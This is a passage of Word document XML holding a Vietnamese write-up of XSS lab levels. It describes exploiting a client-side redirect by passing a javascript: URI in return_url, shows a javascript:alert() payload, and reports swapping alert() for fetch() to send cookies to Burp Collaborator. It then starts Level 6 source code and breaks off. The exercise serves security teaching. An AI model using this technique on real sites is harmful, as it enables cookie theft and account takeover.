              <w:t xml:space="preserve">        }</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="401495A4" w14:textId="77777777" w:rsidR="00841552" w:rsidRPr="00841552" w:rsidRDefault="00841552" w:rsidP="00841552">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="70BD8FD7" w14:textId="77777777" w:rsidR="00841552" w:rsidRPr="00841552" w:rsidRDefault="00841552" w:rsidP="00841552">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00841552">
              <w:t xml:space="preserve">        var info = localStorage.getItem("info");</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="33440E16" w14:textId="77777777" w:rsidR="00841552" w:rsidRPr="00841552" w:rsidRDefault="00841552" w:rsidP="00841552">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00841552">
              <w:t xml:space="preserve">        if (info === "true") {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="54DD39E2" w14:textId="77777777" w:rsidR="00841552" w:rsidRPr="00841552" w:rsidRDefault="00841552" w:rsidP="00841552">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00841552">
              <w:t xml:space="preserve">            redirect()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="46026F6A" w14:textId="77777777" w:rsidR="00841552" w:rsidRPr="00841552" w:rsidRDefault="00841552" w:rsidP="00841552">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00841552">
              <w:t xml:space="preserve">        }</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="667906F4" w14:textId="77777777" w:rsidR="00841552" w:rsidRPr="00841552" w:rsidRDefault="00841552" w:rsidP="00841552">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00841552">
              <w:t xml:space="preserve">    &lt;/script&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2A63042E" w14:textId="7D846A1F" w:rsidR="00510D90" w:rsidRPr="002B4180" w:rsidRDefault="002B4180" w:rsidP="00DC7D26">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="002B4180">
        <w:lastRenderedPageBreak/>
        <w:t>Đoạn HTML và JavaScript này tạo một trang đơn giản cho phép người dùng nhập email, gửi lên endpoint /user, lưu một cờ trong localStorage và sau đó chuyển hướng người dùng tới URL được lấy từ tham số return_url trong query string. Luồng chính: người dùng submit → setInfo gửi fetch("/user") → khi thành công lưu localStorage.info = "true" → gọi redirect() → redirect() đọc return_url từ window.location và gán cho window.location, khiến trình duyệt điều hướng tới giá trị do user cung cấp.</w:t>
      </w:r>
      <w:r w:rsidR="00510D90">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="486B41A7" w14:textId="16631499" w:rsidR="00C30C00" w:rsidRPr="00CF619D" w:rsidRDefault="00C30C00" w:rsidP="00C30C00">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CF619D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">* Ý tưởng </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55C28107" w14:textId="31100545" w:rsidR="00C30C00" w:rsidRPr="0089215E" w:rsidRDefault="00C30C00" w:rsidP="00C30C00">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Thực hiện gửi </w:t>
      </w:r>
      <w:r w:rsidR="00C625E0">
        <w:t xml:space="preserve">URI javascript:{script} vào trong biến </w:t>
      </w:r>
      <w:r w:rsidR="005261B2">
        <w:t>return_</w:t>
      </w:r>
      <w:r w:rsidR="00C625E0">
        <w:t xml:space="preserve">url </w:t>
      </w:r>
      <w:r w:rsidR="005261B2" w:rsidRPr="005261B2">
        <w:t>và lợi dụng việc ứng dụng gán trực tiếp giá trị này cho window.location trên client để thực thi mã JavaScript.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21DCCFD2" w14:textId="77777777" w:rsidR="00C30C00" w:rsidRDefault="00C30C00" w:rsidP="00C30C00">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00184ED1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>* Khai thác</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46B46813" w14:textId="66DC2463" w:rsidR="00DC7D26" w:rsidRPr="00DC7D26" w:rsidRDefault="00C4468B" w:rsidP="00C30C00">
      <w:r>
        <w:t xml:space="preserve">Thực hiện tạo email với giá trị payload XSS đơn </w:t>
      </w:r>
      <w:r w:rsidR="00B007DF">
        <w:t>giản:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75ED2AE0" w14:textId="32092BAE" w:rsidR="005261B2" w:rsidRDefault="00CA0842" w:rsidP="00A3783F">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00CA0842">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1E1AECAC" wp14:editId="3E5FCD03">
            <wp:extent cx="5731510" cy="2636520"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1063571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71992" name="Picture 1" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId42"/>
                    <a:srcRect b="3755"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="2636520"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="32049BC1" w14:textId="7DB689C5" w:rsidR="00CA0842" w:rsidRDefault="00CA0842" w:rsidP="00A3783F">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00CA0842">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5ED04945" wp14:editId="1EC3EEC5">
            <wp:extent cx="4615180" cy="1684020"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="691342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42051" name="Picture 1" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId43"/>
                    <a:srcRect t="5634" b="6103"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4703301" cy="1716174"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C89CD53" w14:textId="22B72CEC" w:rsidR="00A34317" w:rsidRDefault="00A8146F" w:rsidP="00A3783F">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Kết </w:t>
      </w:r>
      <w:r w:rsidR="00A34317">
        <w:t>quả</w:t>
      </w:r>
      <w:r w:rsidR="00EC5099">
        <w:t xml:space="preserve"> cho thấy người dùng đã đăng nhập và 1 trang với một thông báo Welcome &lt;tên email&gt; </w:t>
      </w:r>
      <w:r w:rsidR="00A34317">
        <w:t xml:space="preserve">với giá trị payload được hiển thị lại mà không khởi chạy thẻ script. Điều này chứng tỏ giá trị này đã được lọc một cách an toàn. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48C192E6" w14:textId="6B73890E" w:rsidR="00B007DF" w:rsidRDefault="008E614D" w:rsidP="00A3783F">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Tiếp </w:t>
      </w:r>
      <w:r w:rsidR="00D43EE8">
        <w:t>đó để xem khả năng của window.</w:t>
      </w:r>
      <w:r w:rsidR="00AC3462">
        <w:t xml:space="preserve">location, </w:t>
      </w:r>
      <w:r w:rsidR="00183192">
        <w:t>đưa vào return_url một url đến trang example.</w:t>
      </w:r>
      <w:r w:rsidR="006B0EB0">
        <w:t>com:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ABFD2BF" w14:textId="1498C763" w:rsidR="00CA0842" w:rsidRDefault="00CA0842" w:rsidP="00A3783F">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00CA0842">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4425E201" wp14:editId="75635D67">
            <wp:extent cx="5731510" cy="1753870"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1434700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00757" name="Picture 1" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId44"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="1753870"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AEC93AD" w14:textId="74A212DD" w:rsidR="006B0EB0" w:rsidRDefault="006B0EB0" w:rsidP="00A3783F">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Kết quả đã được chuyển hướng đến example.com:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A57A6BE" w14:textId="6AD25EF4" w:rsidR="006B0EB0" w:rsidRDefault="00AE2907" w:rsidP="00A3783F">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AE2907">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="501DB443" wp14:editId="614A8F06">
            <wp:extent cx="5731510" cy="2586355"/>
            <wp:effectExtent l="0" t="0" r="2540" b="4445"/>
            <wp:docPr id="39544606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46067" name="Picture 1" descr="A screenshot of a web page&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId45"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="2586355"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BA11C92" w14:textId="2391B9C4" w:rsidR="00337950" w:rsidRDefault="00337950" w:rsidP="00A3783F">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Vì vậy thực hiện khai thác thông qua window.location với payload javascript:alert()</w:t>
      </w:r>
      <w:r w:rsidR="000C698F">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61321119" w14:textId="082919B2" w:rsidR="00A865B6" w:rsidRDefault="00A865B6" w:rsidP="00A3783F">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00A865B6">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2BCB6C26" wp14:editId="25467A90">
            <wp:extent cx="5731510" cy="262890"/>
            <wp:effectExtent l="0" t="0" r="2540" b="3810"/>
            <wp:docPr id="3885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5104" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId46"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="262890"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="616DD696" w14:textId="4C1716B0" w:rsidR="00A865B6" w:rsidRDefault="00A865B6" w:rsidP="00A3783F">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00A865B6">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2CCE463D" wp14:editId="271F7380">
            <wp:extent cx="5731510" cy="1496695"/>
            <wp:effectExtent l="0" t="0" r="2540" b="8255"/>
            <wp:docPr id="1804297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97117" name="Picture 1" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId47"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="1496695"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="472275F2" w14:textId="30578423" w:rsidR="000C698F" w:rsidRDefault="000C698F" w:rsidP="00A3783F">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Kết </w:t>
      </w:r>
      <w:r w:rsidR="00571AD4">
        <w:t>quả là cửa sổ popup đã được hiển thị lên chứng minh lệnh javascript alert() đã được thực thi thành công.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BD747A0" w14:textId="7D06A2FD" w:rsidR="00571AD4" w:rsidRDefault="008D197F" w:rsidP="00A3783F">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Thay thế lệnh alert() bằng fetch() để thực hiện </w:t>
      </w:r>
      <w:r w:rsidR="004F4908">
        <w:t>chuyển cookie sang Burp Collaborator:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71B5AAE2" w14:textId="145EA551" w:rsidR="00555A7B" w:rsidRDefault="00555A7B" w:rsidP="00A3783F">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00555A7B">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0DF8C429" wp14:editId="565582CF">
            <wp:extent cx="5731510" cy="911860"/>
            <wp:effectExtent l="0" t="0" r="2540" b="2540"/>
            <wp:docPr id="5499154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15479" name="Picture 1" descr="A screen shot of a computer&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId48"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="911860"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="40D5DE26" w14:textId="4D482538" w:rsidR="004F4908" w:rsidRDefault="004F4908" w:rsidP="00A3783F">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Thành công lấy được </w:t>
      </w:r>
      <w:r w:rsidR="00A524C1">
        <w:t xml:space="preserve">cookie: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="769D3AFD" w14:textId="5C99F9D3" w:rsidR="004F4908" w:rsidRDefault="00555A7B" w:rsidP="00A3783F">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00555A7B">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7C5D41B3" wp14:editId="668DBC0A">
            <wp:extent cx="5731510" cy="1057275"/>
            <wp:effectExtent l="0" t="0" r="2540" b="9525"/>
            <wp:docPr id="183091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1259" name="Picture 1" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId49"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="1057275"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="125BAC6C" w14:textId="61F26FDE" w:rsidR="006420C6" w:rsidRDefault="006420C6">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="09D400BD" w14:textId="2A9C68B9" w:rsidR="006420C6" w:rsidRPr="00FF23DE" w:rsidRDefault="006420C6" w:rsidP="006420C6">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF23DE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Level</w:t>
      </w:r>
      <w:r w:rsidRPr="00C30C00">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="252D0397" w14:textId="71254B17" w:rsidR="006420C6" w:rsidRPr="00377B0F" w:rsidRDefault="00A524C1" w:rsidP="006420C6">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Thông tin source code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6420C6" w:rsidRPr="008E43EE" w14:paraId="08A45174" w14:textId="77777777" w:rsidTr="008E26EB">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D4D4D4"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4AEF82C9" w14:textId="77777777" w:rsidR="006420C6" w:rsidRPr="008E43EE" w:rsidRDefault="006420C6" w:rsidP="008E26EB">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="008E43EE">
              <w:t>1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="61792512" w14:textId="77777777" w:rsidR="006420C6" w:rsidRPr="008E43EE" w:rsidRDefault="006420C6" w:rsidP="008E26EB">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="008E43EE">
              <w:t>2</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7F900B63" w14:textId="77777777" w:rsidR="006420C6" w:rsidRPr="008E43EE" w:rsidRDefault="006420C6" w:rsidP="008E26EB">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="008E43EE">
              <w:t>3</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5411CBBA" w14:textId="77777777" w:rsidR="006420C6" w:rsidRPr="008E43EE" w:rsidRDefault="006420C6" w:rsidP="008E26EB">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="008E43EE">
              <w:t>4</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="49C174AA" w14:textId="77777777" w:rsidR="006420C6" w:rsidRPr="008E43EE" w:rsidRDefault="006420C6" w:rsidP="008E26EB">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="008E43EE">
              <w:t>5</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1DA56C49" w14:textId="77777777" w:rsidR="006420C6" w:rsidRPr="008E43EE" w:rsidRDefault="006420C6" w:rsidP="008E26EB">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="008E43EE">
              <w:t>6</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6E37EDC8" w14:textId="77777777" w:rsidR="006420C6" w:rsidRPr="008E43EE" w:rsidRDefault="006420C6" w:rsidP="008E26EB">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="008E43EE">
              <w:t>7</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="72A9F383" w14:textId="77777777" w:rsidR="006420C6" w:rsidRDefault="006420C6" w:rsidP="008E26EB">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008E43EE">
              <w:t>8</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7CEFCB1E" w14:textId="77777777" w:rsidR="006420C6" w:rsidRDefault="006420C6" w:rsidP="008E26EB">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="165038B5" w14:textId="77777777" w:rsidR="006420C6" w:rsidRDefault="006420C6" w:rsidP="008E26EB">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t>10</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0763ACE2" w14:textId="77777777" w:rsidR="006420C6" w:rsidRDefault="006420C6" w:rsidP="008E26EB">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t>11</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1E9C4682" w14:textId="7BAA63C0" w:rsidR="00B929D6" w:rsidRPr="00377B0F" w:rsidRDefault="002E2A7F" w:rsidP="008E26EB">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t>12</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8829" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D4D4D4"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4CA2FC47" w14:textId="77777777" w:rsidR="00B929D6" w:rsidRPr="00B929D6" w:rsidRDefault="00B929D6" w:rsidP="00B929D6">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00B929D6">
              <w:t>&lt;body&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="23B5085C" w14:textId="77777777" w:rsidR="00B929D6" w:rsidRPr="00B929D6" w:rsidRDefault="00B929D6" w:rsidP="00B929D6">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00B929D6">
              <w:t>  &lt;h1&gt;Quick Note 6&lt;/h1&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="730E7FB8" w14:textId="77777777" w:rsidR="00B929D6" w:rsidRPr="00B929D6" w:rsidRDefault="00B929D6" w:rsidP="00B929D6">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00B929D6">
              <w:t>  &lt;br&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0E46AEEE" w14:textId="77777777" w:rsidR="00B929D6" w:rsidRPr="00B929D6" w:rsidRDefault="00B929D6" w:rsidP="00B929D6">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00B929D6">
              <w:t xml:space="preserve">  &lt;p&gt;Welcome &lt;%= email %&gt;! </w:t>
            </w:r>
            <w:r w:rsidRPr="00B929D6">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
              </w:rPr>
              <w:t>👋</w:t>
            </w:r>
            <w:r w:rsidRPr="00B929D6">
              <w:t>&lt;/p&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="48B1A851" w14:textId="77777777" w:rsidR="00B929D6" w:rsidRPr="00B929D6" w:rsidRDefault="00B929D6" w:rsidP="00B929D6">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00B929D6">
              <w:t>  &lt;form action="/ticket" method="post"&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="62930CAE" w14:textId="77777777" w:rsidR="00B929D6" w:rsidRPr="00B929D6" w:rsidRDefault="00B929D6" w:rsidP="00B929D6">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00B929D6">
              <w:t>    &lt;label&gt;Need help? &lt;/label&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3E5A6692" w14:textId="77777777" w:rsidR="00B929D6" w:rsidRPr="00B929D6" w:rsidRDefault="00B929D6" w:rsidP="00B929D6">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00B929D6">
              <w:t>    &lt;input type="text" name="content"&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2D1DD671" w14:textId="77777777" w:rsidR="00B929D6" w:rsidRPr="00B929D6" w:rsidRDefault="00B929D6" w:rsidP="00B929D6">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00B929D6">
              <w:t>    &lt;input type="submit" value="</w:t>
            </w:r>
            <w:r w:rsidRPr="00B929D6">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
              </w:rPr>
              <w:t>📝</w:t>
            </w:r>
            <w:r w:rsidRPr="00B929D6">
              <w:t>"&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6CB87A00" w14:textId="77777777" w:rsidR="00B929D6" w:rsidRPr="00B929D6" w:rsidRDefault="00B929D6" w:rsidP="00B929D6">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00B929D6">
              <w:t>  &lt;/form&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7C2D40BE" w14:textId="77777777" w:rsidR="00B929D6" w:rsidRPr="00B929D6" w:rsidRDefault="00B929D6" w:rsidP="00B929D6">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00B929D6">
              <w:t>  &lt;br&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6F19A4D8" w14:textId="77777777" w:rsidR="00B929D6" w:rsidRPr="00B929D6" w:rsidRDefault="00B929D6" w:rsidP="00B929D6">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
